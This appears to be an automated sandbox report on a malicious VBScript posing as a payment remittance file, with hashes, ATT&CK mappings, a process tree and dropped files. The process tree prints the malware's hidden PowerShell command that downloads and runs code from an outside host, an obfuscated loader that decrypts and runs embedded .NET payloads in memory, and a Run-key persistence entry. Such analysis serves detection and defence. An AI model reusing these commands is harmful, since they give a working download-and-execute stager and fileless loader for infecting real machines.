b89759e93738b1b607e48a29f62bfda31e555b0aad30614c261ddf4ba10bdcdf

General

Target

Payment Remittance Advice Details.vbs
Size

67KB
MD5

9ffb1e62265a9b36d8c29afafc14f6fe
SHA1

7e0abfdff1019bf28267f069b6fdf6658eb742b5
SHA256

b89759e93738b1b607e48a29f62bfda31e555b0aad30614c261ddf4ba10bdcdf
SHA512

7458a2fb582a0a314ff9d443515ab4379e9a71e26ccf0788e971898b32be58b64f82771dfc901eafe9e28db0755146432f02be5892fb64188c129e72f3d402f0
SSDEEP

1536:VpR0fCWy9wwuo9MIA9Y31BYfHAoH7XpUoQ0tThvi:j8vwwI9Mz9Y3GZ19Q6hvi

Score

8^/10

execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3064	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftService = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat\""	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3064	powershell.exe
2268	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	2268	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2072 wrote to memory of 3064	2072	WScript.exe	30
PID 2072 wrote to memory of 3064	2072	WScript.exe	30
PID 2072 wrote to memory of 3064	2072	WScript.exe	30
PID 2072 wrote to memory of 2632	2072	WScript.exe	33
PID 2072 wrote to memory of 2632	2072	WScript.exe	33
PID 2072 wrote to memory of 2632	2072	WScript.exe	33
PID 2632 wrote to memory of 2684	2632	cmd.exe	35
PID 2632 wrote to memory of 2684	2632	cmd.exe	35
PID 2632 wrote to memory of 2684	2632	cmd.exe	35
PID 2684 wrote to memory of 1704	2684	cmd.exe	37
PID 2684 wrote to memory of 1704	2684	cmd.exe	37
PID 2684 wrote to memory of 1704	2684	cmd.exe	37
PID 2684 wrote to memory of 2268	2684	cmd.exe	38
PID 2684 wrote to memory of 2268	2684	cmd.exe	38
PID 2684 wrote to memory of 2268	2684	cmd.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment Remittance Advice Details.vbs"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3064
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\system.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\system.bat';$tSzt='CoyggSpyyggSTyggSoyggS'.Replace('yggS', ''),'TreKpmaneKpmsfeKpmormeKpmFeKpmineKpmaeKpmlBeKpmloceKpmkeKpm'.Replace('eKpm', ''),'ErHgtlemrHgtentrHgtAtrHgt'.Replace('rHgt', ''),'LoaWwjgdWwjg'.Replace('Wwjg', ''),'DecGFmyompGFmyrGFmyessGFmy'.Replace('GFmy', ''),'CrFbwFeFbwFateFbwFDecFbwFrFbwFyptFbwForFbwF'.Replace('FbwF', ''),'InhKbUvhKbUokehKbU'.Replace('hKbU', ''),'MaBxbRinBxbRMBxbRodBxbRulBxbReBxbR'.Replace('BxbR', ''),'SpYdNplpYdNipYdNtpYdN'.Replace('pYdN', ''),'EnthHmDryPhHmDoihHmDnthHmD'.Replace('hHmD', ''),'ReNXtTadLNXtTinNXtTesNXtT'.Replace('NXtT', ''),'GePRsKtCPRsKurPRsKrPRsKePRsKntPRsKPrPRsKoPRsKcPRsKesPRsKsPRsK'.Replace('PRsK', ''),'ChpQqmangpQqmeEpQqmxtepQqmnpQqmsipQqmonpQqm'.Replace('pQqm', ''),'FrrEElorEElmBarEElserEEl64rEElStrEElrrEElinrEElgrEEl'.Replace('rEEl', '');powershell -w hidden;function aRtvG($VLEjt){$KNVsD=[System.Security.Cryptography.Aes]::Create();$KNVsD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KNVsD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KNVsD.Key=[System.Convert]::($tSzt[13])('ZsQNWZMNttfFdanp5YMfjA81pjXlEiaRBDoUMbmKu7A=');$KNVsD.IV=[System.Convert]::($tSzt[13])('Zwl9jKpodheYgolhwF+ZoA==');$NvSea=$KNVsD.($tSzt[5])();$ocMex=$NvSea.($tSzt[1])($VLEjt,0,$VLEjt.Length);$NvSea.Dispose();$KNVsD.Dispose();$ocMex;}function DyGwn($VLEjt){$TnJXr=New-Object System.IO.MemoryStream(,$VLEjt);$ALCZl=New-Object System.IO.MemoryStream;$vftmX=New-Object System.IO.Compression.GZipStream($TnJXr,[IO.Compression.CompressionMode]::($tSzt[4]));$vftmX.($tSzt[0])($ALCZl);$vftmX.Dispose();$TnJXr.Dispose();$ALCZl.Dispose();$ALCZl.ToArray();}$bjAKz=[System.IO.File]::($tSzt[10])([Console]::Title);$AliFC=DyGwn (aRtvG ([Convert]::($tSzt[13])([System.Linq.Enumerable]::($tSzt[2])($bjAKz, 5).Substring(2))));$vtSyn=DyGwn (aRtvG ([Convert]::($tSzt[13])([System.Linq.Enumerable]::($tSzt[2])($bjAKz, 6).Substring(2))));[System.Reflection.Assembly]::($tSzt[3])([byte[]]$vtSyn).($tSzt[9]).($tSzt[6])($null,$null);[System.Reflection.Assembly]::($tSzt[3])([byte[]]$AliFC).($tSzt[9]).($tSzt[6])($null,$null); "
      4⤵
      PID:1704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2268

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
66KB

MD5
5f705dae5b64c2091db9b36fed377e74

SHA1
10209ca44ec5fc7289371296f0113e5001a7a3d2

SHA256
de81ae7b4398a1ec4091ad8e9ed9cf4fdc1ed88b7b1af8a5d07aacba1b0f4af7

SHA512
23b077a0fd01fa85a9f81b2f14db30a99a44bc3a1c45131f235fdf0c87542d33b4ea042db620fa50c924e214ce1e428eb05d0f651f7119979e07767df3b17878

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
06e9715da45c0b6a457927fc2d57a85a

SHA1
16d73838e476d1ac242ff9b52ccad038871c1e30

SHA256
5ec68bf7b12bb9ff4ee1f79420d99fdd574fbe3747a1ea42ec1fb00aafd8b9d3

SHA512
9e5edee045c41de1fee3c7273b307c2e988ea1d0d2b94eb2d371f0787a842e2452ea2bc04ef0ae631a6be1d23324e6c47c782892c02352209ca4ee888491f4d2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D1DS4P5RM4WE3ERAZ9IE.temp

Filesize
7KB

MD5
5d23d313e7dfbf60f1fa04c504b0f6d8

SHA1
ed1ac0e0b269545bdd8fe760b11422fffde1a844

SHA256
95ed44fc2ce0bd1331a78f20fd8596777b89b0b75ec832091e800120e516d1db

SHA512
be13f2893b4a3b5ff114c7d4ae211f98f042e8a20a883344fe12169e140e1a418209fb0be9c833e4ab166ab02b6099c3102e1d2e2f930d4ef0f49c6a4849989b

Download Submit
memory/2268-27-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/2268-28-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/3064-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/3064-10-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/3064-11-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/3064-12-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/3064-9-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/3064-8-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/3064-4-0x000007FEF59DE000-0x000007FEF59DF000-memory.dmp

Filesize
4KB

Download
memory/3064-7-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp

Filesize
9.6MB

Download
memory/3064-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads